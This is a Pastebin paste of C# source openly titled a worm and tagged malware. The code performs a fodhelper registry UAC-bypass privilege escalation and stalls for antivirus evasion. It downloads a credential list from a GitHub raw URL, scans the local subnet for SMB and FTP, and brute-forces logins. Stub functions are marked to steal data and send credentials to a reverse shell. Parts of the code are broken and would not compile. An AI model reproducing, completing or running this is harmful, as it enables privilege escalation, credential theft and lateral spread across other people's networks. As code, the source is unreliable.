Advertisement
FlyFar

bdunlap9's C# Worm - Source Code

Jul 4th, 2023
825
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 6.77 KB | Cybersecurity | 0 0
  1. using System;
  2. using System.IO;
  3. using System.Threading;
  4. using System.Net;
  5. using System.Net.Sockets;
  6. using Microsoft.Win32;
  7.  
  8. namespace Worm
  9. {
  10.     class Program
  11.     {  
  12.         static void privEsc()
  13.         {
  14.             // Windows 10 priv esc method via fodhelper.exe and registry
  15.             // Get the path of the current running executable
  16.             string exePath = System.Reflection.Assembly.GetExecutingAssembly().Location;
  17.  
  18.             // Set the registry key value
  19.             Registry.SetValue(@"HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command", "", exePath, RegistryValueKind.String);
  20.  
  21.             // Set the registry key value for "DelegateExecute"
  22.             Registry.SetValue(@"HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command", "DelegateExecute", "fodhelper.exe", RegistryValueKind.String);
  23.         }
  24.  
  25.         static void junk()
  26.         {
  27.             Random random = new Random();
  28.             var stopTime = DateTime.Now.AddSeconds(30);
  29.  
  30.             while (DateTime.Now < stopTime)
  31.             {
  32.                 Console.Write((char)random.Next(32, 128));
  33.                 Thread.Sleep(10);
  34.             }
  35.         }
  36.  
  37.         static void gatherInfo():
  38.         {
  39.             // Gather computer info and identifiers
  40.  
  41.  
  42.             // upload to dashboard
  43.  
  44.         }
  45.  
  46.         static void Stealer()
  47.         {
  48.             // save data and upload to dashboard with user information
  49.  
  50.         }
  51.  
  52.         static void ftp_Payload()
  53.         {
  54.             // save credentials & send back to reverse shell
  55.  
  56.         }
  57.  
  58.         static void smb_Payload()
  59.         {
  60.             // save credntials & send back to reverse shell
  61.  
  62.         }
  63.  
  64.         static void SMBFTP()
  65.         {
  66.             // Get the IP address of the local machine
  67.             string host = Dns.GetHostName();
  68.             IPHostEntry ip = Dns.GetHostEntry(host);
  69.             IPAddress localAddress = ip.AddressList[0];
  70.  
  71.             // Get the subnet mask of the local machine
  72.             IPInterfaceProperties adapterProperties = NetworkInformation.GetIPProperties(localAddress);
  73.             IPAddress mask = adapterProperties.UnicastAddresses[0].IPv4Mask;
  74.  
  75.             // Calculate the subnet address
  76.             byte[] ipAdressBytes = localAddress.GetAddressBytes();
  77.             byte[] subnetMaskBytes = mask.GetAddressBytes();
  78.             byte[] subnetAddressBytes = new byte[ipAdressBytes.Length];
  79.             for (int i = 0; i < subnetAddressBytes.Length; i++)
  80.             {
  81.                 subnetAddressBytes[i] = (byte)(ipAdressBytes[i] & subnetMaskBytes[i]);
  82.             }
  83.             IPAddress subnetAddress = new IPAddress(subnetAddressBytes);
  84.  
  85.             // Download the credentials from the GitHub repository
  86.             WebClient client = new WebClient();
  87.             string credentials = client.DownloadString("https://raw.githubusercontent.com/<repo_name>/credentials.txt");
  88.             string[] lines = credentials.Split('\n');
  89.             List<Tuple<string, string>> credList = new List<Tuple<string, string>>();
  90.             for (int i = 0; i < lines.Length; i+=2)
  91.             {
  92.                 credList.Add(new Tuple<string, string>(lines[i], lines[i+1]));
  93.             }
  94.  
  95.             // Scan all IP addresses in the subnet
  96.             int portNumber;
  97.             TcpClient client = new TcpClient();
  98.             for (int i = 1; i < 255; i++)
  99.             {
  100.                 // Check if SMB port (445) is open
  101.                 string remoteAddress = subnetAddress.ToString().Substring(0, subnetAddress.ToString().LastIndexOf('.') + 1) + i.ToString();
  102.                 try
  103.                 {
  104.                     client.Connect(remoteAddress, 445);
  105.                     Console.WriteLine(remoteAddress + " has open SMB port.");
  106.                     foreach (var cred in credList)
  107.                     {
  108.                         try
  109.                         {
  110.                             NetworkCredential networkCredential = new NetworkCredential(cred[0], cred[1]);
  111.                             using (var smbClient = new SmbClient(remoteAddress, networkCredential))
  112.                             {
  113.                                 Console.WriteLine("Successfully connected to " + remoteAddress + " using " + cred[0] + "/" + cred[1]);
  114.                                 smb_Payload();
  115.                             }
  116.                             break;
  117.                         }
  118.                         catch (Exception)
  119.                         {
  120.                             Console.WriteLine("Failed to connect to " + remoteAddress + " using " + cred[0] + "/" + cred[1]);
  121.                         }
  122.                     }
  123.                 }
  124.                 catch (Exception)
  125.                 {
  126.                     // Console.WriteLine(remoteAddress + " does not have open SMB port.");
  127.                 }
  128.  
  129.                 // Check if FTP port (21) is open
  130.                 try
  131.                 {
  132.                     client.Connect(remoteAddress, 21);
  133.                     Console.WriteLine(remoteAddress + " has open FTP port.");
  134.                     foreach (var cred in credList)
  135.                     {
  136.                         try
  137.                         {
  138.                             FtpWebRequest request = (FtpWebRequest)WebRequest.Create("ftp://" + remoteAddress);
  139.                             request.Credentials = new NetworkCredential(cred[0], cred[1]);
  140.                             request.Method = WebRequestMethods.Ftp.ListDirectory;
  141.  
  142.                             FtpWebResponse response = (FtpWebResponse)request.GetResponse();
  143.                             Console.WriteLine("Connected to the FTP server successfully using credentials: " + cred[0] + "," + cred[1]);
  144.                             response.Close();
  145.                             ftp_Payload();
  146.                             break;
  147.                         }  
  148.                         catch (WebException ex)
  149.                         {
  150.                             // Console.WriteLine("Failed to connect to the FTP server using credentials: " + cred[0] + "," + cred[1]);
  151.                         }
  152.                     }
  153.                 }
  154.                 catch (Exception)
  155.                 {
  156.                     // Console.WriteLine(remoteAddress + " does not have open FTP port.");
  157.                 }
  158.             }
  159.             Console.ReadKey();
  160.         }
  161.  
  162.         static void Main(string[] args)
  163.         {
  164.             // Init class
  165.             Program worm = new Program();
  166.  
  167.             // junk code for 30 seconds and wait another 10 secs before executing the rest for basic AV Evasion
  168.             worm.junk();
  169.  
  170.             // Priv Escalation
  171.             worm.privEsc();
  172.  
  173.             // Stealer
  174.             worm.Stealer();
  175.  
  176.             // Scan for new targets
  177.             worm.SMBFTP();
  178.         }
  179.     }
  180. }
Tags: malware worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement